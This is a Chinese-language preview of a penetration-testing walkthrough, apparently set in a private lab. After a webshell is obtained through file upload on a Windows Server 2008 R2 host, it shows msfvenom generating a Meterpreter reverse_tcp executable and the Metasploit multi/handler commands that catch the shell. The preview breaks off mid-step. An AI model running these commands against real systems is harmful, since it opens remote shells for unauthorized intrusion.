文章预览
环境信息 攻击者机:kali 192.168.8.139 靶机:windows server2008 r2 en 192.168.8.84 目前通过文件上传,拿到webshell,蚁剑连接,发现用户仅为普通用户abc,想要提权 具体操作 先在kali,打开个终端,用msfconsole命令,进入msf的工作台 输入以下命令,在本地桌面生成个反弹shell的exe msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.139 lport=8087 -f exe >/home/kali/Desktop/abc5.exe # lhost 是kali的ip # lport 是kali监听端口 把这个exe,上传到目标服务器上,我是用蚁剑直接拖上去的 然后回到kali 输入一下命令 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.8.139 set lport 8087 exploit use exploit/multi/handler进入这个模块(监听模块) set payload windows/meterpreter/reverse_tcp设置它是反弹类型的shell exploit运行当前模块 此时,kali开始监听,这个端口 这个时候,我们去蚁剑让服务器运
………………………………